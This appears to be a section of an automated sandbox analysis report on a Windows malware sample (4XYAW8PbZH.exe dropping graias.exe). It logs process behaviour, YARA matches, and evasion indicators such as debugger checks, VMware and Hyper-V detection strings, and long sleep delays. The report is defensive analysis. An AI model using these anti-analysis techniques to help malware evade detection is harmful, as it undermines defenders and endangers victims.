                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: graias.exe PID: 7188, type: MEMORYSTR
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0040E54F Sleep,ExitProcess,3_2_0040E54F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: DF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: 2910000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: 2830000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: 7CB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: 7590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: 8CB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: 9CB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 13B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 2EC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 4EC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 7DA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 7680000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 8DA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory allocated: 9DA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_004198D2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5078
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 630
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7181
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2385
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Window / User API: threadDelayed 9263
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Window / User API: foregroundWindowGot 1531
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Evaded block: after key decision (graph_3-47121)
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Evaded block: after key decision (graph_3-47097)
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Evaded block: after key decision (graph_3-47101)
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | API coverage: 5.8 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 404 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 | Thread sleep count: 7181 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 | Thread sleep count: 2385 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7400 | Thread sleep count: 130 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7400 | Thread sleep time: -65000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404 | Thread sleep count: 9263 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404 | Thread sleep time: -27789000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404 | Thread sleep count: 287 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404 | Thread sleep time: -861000s >= -30000s
                Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B43F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C79
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File opened: C:\Users\user
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File opened: C:\Users\user\AppData
                Source: Amcache.hve.7.dr | Binary or memory string: VMware
                Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
                Source: svchost.exe, 00000018.00000002.1912988651.0000000002E71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n;
                Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: graias.exe, 0000000B.00000002.4169480576.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000008C.00000002.3990411733.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: svchost.exe, 00000064.00000002.3204757473.000000000306C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: svchost.exe, 00000069.00000002.3284491300.000000000323F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
                Source: Amcache.hve.7.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: svchost.exe, 0000008C.00000002.3990411733.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: svchost.exe, 00000018.00000002.1912882043.0000000002E53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: svchost.exe, 00000014.00000002.1869527546.0000000003680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
                Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: svchost.exe, 00000064.00000002.3204512636.000000000303F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043A66D
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCF3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00442564 mov eax, dword ptr fs:[00000030h] 3_2_00442564
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_0044E93E GetProcessHeap,3_2_0044E93E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00434178
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00433B54
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00433CE7 SetUnhandledExceptionFilter,3_2_00433CE7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

